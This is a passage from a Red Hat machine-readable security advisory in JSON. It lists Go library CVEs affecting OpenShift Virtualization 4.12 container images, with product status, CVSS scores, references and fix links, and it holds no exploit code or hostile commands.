"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2022-30633" }, { "category": "external", "summary": "RHBZ#2107392", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107392" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2022-30633", "url": "https://www.cve.org/CVERecord?id=CVE-2022-30633" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-30633", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-30633" }, { "category": "external", "summary": "https://go.dev/issue/53611", "url": "https://go.dev/issue/53611" }, { "category": "external", "summary": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", "url": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE" } ], "release_date": "2022-07-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2023-01-25T11:11:29+00:00", "details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2023:0408" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "golang: encoding/xml: stack exhaustion in Unmarshal" }, { "cve": "CVE-2022-30635", "cwe": { "id": "CWE-1325", "name": "Improperly Controlled Sequential Memory Allocation" }, "discovery_date": "2022-07-14T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2107388" } ], "notes": [ { "category": "description", "text": "A flaw was found in golang. When calling Decoder, Decode on a message that contains deeply nested structures, a panic can occur due to stack exhaustion and allows an attacker to impact system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "golang: encoding/gob: stack exhaustion in Decoder.Decode", "title": "Vulnerability summary" }, { "category": "other", "text": "OpenShift Container Platform (OCP) starting from 4.10 stream is already compiled in the patched version of Go, hence is not affected by this vulnerability.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64" ], "known_not_affected": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2022-30635" }, { "category": "external", "summary": "RHBZ#2107388", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2022-30635", "url": "https://www.cve.org/CVERecord?id=CVE-2022-30635" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-30635", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-30635" }, { "category": "external", "summary": "https://go.dev/issue/53615", "url": "https://go.dev/issue/53615" }, { "category": "external", "summary": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", "url": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE" } ], "release_date": "2022-07-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2023-01-25T11:11:29+00:00", "details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2023:0408" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "golang: encoding/gob: stack exhaustion in Decoder.Decode" }, { "cve": "CVE-2022-32148", "cwe": { "id": "CWE-200", "name": "Exposure of Sensitive Information to an Unauthorized Actor" }, "discovery_date": "2022-07-14T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", 